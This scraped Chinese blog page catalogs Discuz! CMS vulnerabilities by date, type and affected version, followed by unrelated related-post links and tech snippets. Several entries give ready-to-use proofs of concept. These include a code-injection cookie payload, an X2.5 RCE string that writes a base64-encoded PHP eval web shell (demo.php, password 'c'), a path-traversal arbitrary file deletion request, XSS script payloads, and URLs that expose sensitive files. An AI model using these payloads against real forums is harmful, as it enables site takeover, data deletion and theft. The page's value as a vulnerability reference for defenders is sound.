应用安全 - CMS - Discuz漏洞汇总
Discuz ML! V3.X 代码注入
Date
类型
代码注入导致RCE 影响范围
Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012 类型:
敏感信息泄露 影响范围:
DZ x2.5 POC:
http://www.xx.xx/uc_server/control/admin/db.php
http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php
http://www.xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date:
类型:
RCE 前置条件:
().注册任意账户
().登陆用户,发表blog日志(注意是日志)
().添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
().访问日志,论坛根目录下生成demo.php,一句发密码c 影响范围:
v2.
Discuz!X2/2.5弱口令破解漏洞
Date:
类型:
登录界面暴力破解 影响范围:
Discuz!X2/2.5
ssvid-93588
Date:
类型:
任意文件删除 前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10 类型:
前台任意文件删除 影响范围:
SSV-89024
Date:
2015.1 类型:
Discuz X2. /source/class/class_image.php 命令执行漏洞 影响范围:
Discuz X2.
Discuz! X系列远程代码执行漏洞
Date:
2015.8 类型:
RCE + XML反序列化 前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3 类型:
SSRF
影响范围:
Discuz! X2 X3 POC:
http://www.internetblog.cn/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8 类型:
远程代码执行
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析 Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script> Discuz! X1某页面存在XSS漏洞
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
应用安全 - CMS - Discuz漏洞汇总的更多相关文章
- 应用安全 - PHP - CMS - EmpireCMS - 漏洞 - 汇总
2006 Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability Empire CMS Checklevel.P ...
- 应用安全 - PHP - CMS - DeDeCMS - 漏洞 - 汇总
SSV-97074 Date 类型 前台任意密码修改 影响范围 前置条件 CVE-2018-20129 Date 类型前台文件上传 影响范围 前置条件(1)前台登录(2)/member/article ...
- 应用安全 - CMS - ThinkCMF - 漏洞汇总
ThinkCMF X1.6.0-X2.2.3任意内容包含漏洞 Date: 2019.10 类型: 任意文件写入导致远程代码执行 影响范围: ThinkCMF X1.6.0 ThinkCMF X2.1. ...
- 应用安全 - CMS - vBulletin漏洞汇总
SSV-15384 Date: 2004.11 漏洞类别: SQL 注入 SSV-15476 Date: 2005.2 漏洞类别: RCE SSV-15482 Date: 2005.2 类型: RCE ...
- 应用安全 - CMS - PHPCMS漏洞汇总
CVE-2011-0644 Date: 2011.1 类型: /flash_upload.php SQL注入 影响版本:phpCMS 2008 V2 PHPCMS PHPCMS通杀XSS 在我要报错功 ...
- 苹果cms网站漏洞修复解决办法
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,s ...
- Discuz被挂马 快照被劫持跳转该如何处理 如何修复discuz漏洞
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2.X3.3来,最稳定的社区论坛系统.目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全 ...
- 怎么修复网站漏洞 骑士cms的漏洞修复方案
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
随机推荐
- node模块管理
淘宝镜像:npm install -g cnpm --registry=https://registry.npm.taobao.org
- SpringFramework中的BeanWrapper丶PropertyEditor
BeanWrapper是org.springframework.beans包下的一个借口,对应的实现类为BeanWrapperImpl,提供对应的get/set方法,并且设置属性的可读性和可写性. p ...
- Python的题目
1.将元组 (1,2,3) 和集合 {4,5,6} 合并成一个列表.2.在列表 [1,2,3,4,5,6] 首尾分别添加整型元素 7 和 0.3.反转列表 [0,1,2,3,4,5,6,7] .4.反 ...
- springboot+mybatis日志显示SQL的最简单方法
在springBoot+Mybatis日志显示SQL的执行情况的最简单方法就是在properties新增:logging.level.cn.piesat.mapper=debug 注意:其中cn.pi ...
- 1.关于python 的hmac加密
import base64 import hmac import urllib from hashlib import sha1 expires = b" # 过期时间戳 uuid = 'a ...
- jquery eq()选择器 语法
jquery eq()选择器 语法 作用::eq() 选择器选取带有指定 index 值的元素.index 值从 0 开始,所有第一个元素的 index 值是 0(不是 1).经常与其他元素/选择器一 ...
- K8S简介
简介 Kubernetes是一个开源的,用于管理云平台中多个主机上的容器化的应用,Kubernetes的目标是让部署容器化的应用简单并且高效(powerful),Kubernetes提供了应用部署,规 ...
- tf.random_uniform出错tensorflow2.0出错
https://blog.csdn.net/hhy_csdn/article/details/82263007 https://blog.csdn.net/weixin_44038165/articl ...
- JMS学习三(ActiveMQ消息的可靠性)
下面我们来学习一下消息接受确认和发送持久化消息.消息的过期.消息的选择器和消息的优先级. 一.消息接收确认 1.jms消息只有在被确认之后才认为成功消费了这条消息.消息的成功消费通常包括三个步骤:(1 ...
- Burp suite抓取HTTPS请求
一.下载链接:Burp suite 密码:orpr 二.抓取浏览器HTTPS请求 1.打开CMD,进入到Burp suite下载路径,执行:java -jar BurpLoader.jar 2.点击 ...